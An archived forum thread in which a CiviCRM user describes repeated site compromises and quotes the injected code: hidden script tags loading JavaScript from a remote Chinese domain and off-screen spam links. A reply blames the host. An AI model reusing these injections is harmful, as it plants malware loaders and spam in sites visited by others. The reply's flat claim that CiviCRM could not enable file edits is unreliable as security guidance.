CiviCRM Community Forums (archive)

We're having a problem where our site is getting hi-jacked once or twice a week. (Not sure hacked or hijacked is even the proper terminology but I'll explain ...)

When the site goes down, it's replaced with this:

Parse error: syntax error, unexpected '<' in /home/ccag/public_html/index.php on line 41

It's always an easy enough fix as I simply go to index.php line 41 and find something like this:

<div style="display:none"><script language=javascript src=http://zhou.p22p.cn/about/3.js></script></div>
<script language=javascript src=http://zhou.p22p.cn/about/4.js></script>
<div style="position: absolute; top: -999px;left: -999px;">
<A href="http://www.surfpage.net" title="surf page">surf page</A>
<A href="http://www.taoxbao.com/" title="taobao">taobao</A>
<A href="http://zhou51672.no54.cuttle.com.cn">taobao</A>
<A href="http://www.1etao.com/" title="etao">etao</A>
</div>
at the end of the page after drupal_page_footer();
and delete it.

It's also added to the index.html file the host provided in case our site was down but come to think of it we don't need so I just deleted it.

So anyway, a week after they said they are investigating I got this after another hack today:

So far it's looking like this is happening via the civicrm software (or the code produced by it) leaving a vulnerability - in other words, a software security issue.

My reply, yet to be answered, is "what is indicating this to you?" I am skeptical.

We are on a dedicated server with multiple installs.

Any thoughts? More info I could provide?

There is no question that CiviCRM could possibly be editing your index.php file--that's simply not possible. To suggest even that some sort of security hole in CiviCRM allows a hacker to edit the index.php file is also essentially completely ridiculous.

If your host allows your sites to be hacked twice a week, I would switch hosts. Especially if he tries to blame someone else for his lack of security.

I was recently aware of a high-profile hacking which involved a weakness in control panel software -this sort of thing is much more likely because the account under which your web service runs should never be able to edit index.php (under a properly configured server).

Generally speaking if you had experienced a security issue relating to drupal, joomla or CiviCRM it would most likely be the database that is affected not the file system. And certainly not files that the web server account (or any account for that matter) shouldn't have write access to